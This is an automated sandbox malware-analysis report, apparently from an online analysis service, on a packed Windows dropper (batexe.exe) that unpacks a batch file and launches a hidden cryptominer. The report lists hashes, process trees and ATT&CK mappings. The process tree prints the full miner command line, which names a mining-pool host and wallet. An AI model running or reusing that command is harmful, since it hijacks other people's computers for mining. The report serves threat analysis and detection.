73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
295s
max time network
305s
platform
windows10-1703_x64
resource
win10-20231215-ja
resource tags

arch:x64arch:x86image:win10-20231215-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
14-02-2024 10:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
4492	b2e.exe
4168	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
4168	cpuminer-sse2.exe
4168	cpuminer-sse2.exe
4168	cpuminer-sse2.exe
4168	cpuminer-sse2.exe
4168	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/520-6-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 520 wrote to memory of 4492	520	batexe.exe	74
PID 520 wrote to memory of 4492	520	batexe.exe	74
PID 520 wrote to memory of 4492	520	batexe.exe	74
PID 4492 wrote to memory of 4688	4492	b2e.exe	75
PID 4492 wrote to memory of 4688	4492	b2e.exe	75
PID 4492 wrote to memory of 4688	4492	b2e.exe	75
PID 4688 wrote to memory of 4168	4688	cmd.exe	78
PID 4688 wrote to memory of 4168	4688	cmd.exe	78

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:520
- C:\Users\Admin\AppData\Local\Temp\1170.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\1170.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\1170.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4492
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1661.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4688
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4168

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\1170.tmp\b2e.exe

Filesize
3.3MB

MD5
6bc6eef87ea5d1bc00da5a3227d93207

SHA1
c4b36440c097a5cf0b199228534c05f33cd4a298

SHA256
12650b052e3a4ad9d6d7cefa17c492cbd366e6aaff72f1d604462a217c3ab19e

SHA512
17b7bbe942b36469dd00b3daf8c08ba763c7d3d45a42eb48c57c73706dc615a080822e6aed386364acccbed302782231cb344396ddd08d35e635277074ac9fb9

Download Submit
C:\Users\Admin\AppData\Local\Temp\1170.tmp\b2e.exe

Filesize
3.3MB

MD5
1defb188bb086addb5d5b32401ad9d08

SHA1
a085b8715fa6989eabdc2e88b487faa3bd990130

SHA256
5a82d3e7656c4caa2f32220c498f5eec7372ec649c88f3e85eff76a0388f1a8f

SHA512
24dd6158ae1a4e2418b9454935331b0a83dbad3603d58a619d86c6ec85afc4ad7dc007d53066aa2c8d5b91e5223410b02705d280df10a4f97753058dc50dc4e4

Download Submit
C:\Users\Admin\AppData\Local\Temp\1661.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
876KB

MD5
151d1fe58f498b597748541e4bb8ab46

SHA1
ed716e4525c8923dff33158f812abfe49f0ead8b

SHA256
5020d59462aa52aa8f51c95b85668cffb69769c97fdfaac32eb13cc2efa0f2ca

SHA512
30d389e003f0c32c8f1ef52b7d31bc25dae2cfa069cfacbb81facffae0a80e3c4f6cfab5f606424ed09e62b877ca6a64f3eb04a999edadec7c30de155fc32aa7

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
772KB

MD5
f0e319152fff58825093a0c0919a64a2

SHA1
3e731b6c037df9fdbaacb78ccffa986a333f312a

SHA256
012695cfa28642d197b57a264dac353a684aa6698f92d15f832dcfea8e901cce

SHA512
53a9091c7d5e318a4426f346b8262be9ce0ac26b39ec622b3710d4d150cac2150831f668f9a5d13888f09b596a7f096acf87444e1e8987b4eb10873a6398e692

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
836KB

MD5
aeab40ed9a8e627ea7cefc1f5cf9bf7a

SHA1
5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

SHA256
218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

SHA512
c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
1.2MB

MD5
7cf672bee2afba2dcd0c031ff985958e

SHA1
6b82a205db080ffdcb4a4470fce85a14413f3217

SHA256
c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05

SHA512
3e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
957KB

MD5
0861c584340a1746ecf217badbd80b71

SHA1
d84bd0994970c13eb955cec2b70d657966469cb5

SHA256
be01d60dda28ebfca8a38fa4351e85ac294b5542939a497baa4a2dfcc457d415

SHA512
17985566f4eb4a011b8285a6bd8f4984b864726237455e9eccd79775ba94266e3a16f77132c9c75838f5d6fdd626a2f322805c5b1c8b3a49d87507fbd74e0d88

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
1.2MB

MD5
fda30b33595786bc121b990d2a1468f3

SHA1
1a1895ff42c2d601073114f198493ce957c114bf

SHA256
40e57c87726848c5b379506b7af7f94fa8859bcedb7bfd2480b13cff8b7f3f83

SHA512
8fb285cd0e3f347979a840fd48804d65dae22a263a8b8fcc18a6b3c80e1afa160d8fba22b06a2ce4da5326544e0ae55a94b0be4745f29f5a4c08f334e361dd61

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
982KB

MD5
898018ae6088654d532935c572acd837

SHA1
3c1b4f92e0ae5b0e58aabd33a641cb62c9eeedb4

SHA256
f1c6c6b2f48c0c747bcec55f8b8b230858ad09529674c97a42e7fd6c73c65674

SHA512
298bed4059c2e9e7ac0f6855e13f9bd50845bf4f8d0cb5ec5f2ec906dedb09bb8350e4adf21f8570293d75dac467be373795301b8a7f6e41e04456bbe075b4d1

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
866KB

MD5
ca76b9d78d525d7caa081b2f4cb439e9

SHA1
f8558654dda26ce9956abe222ee4456b120c8063

SHA256
44e8ba3f9945b566ee03050ec6f55da429b8ccfa852aa577925f0f2e72941776

SHA512
a795574ae1583f1ffa30de03d1c41e3014116685fc495990619b206cec4292bfa86cf473062a3894335cf012930aff378841221d51c2ec2dce834b881f8f39da

Download Submit
memory/520-6-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/4168-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4168-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4168-41-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/4168-42-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/4168-43-0x0000000068830000-0x00000000688C8000-memory.dmp

Filesize
608KB

Download
memory/4168-44-0x0000000001100000-0x00000000029B5000-memory.dmp

Filesize
24.7MB

Download
memory/4168-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4168-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4168-51-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4168-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4168-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4168-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4168-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4168-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4168-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4492-5-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4492-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download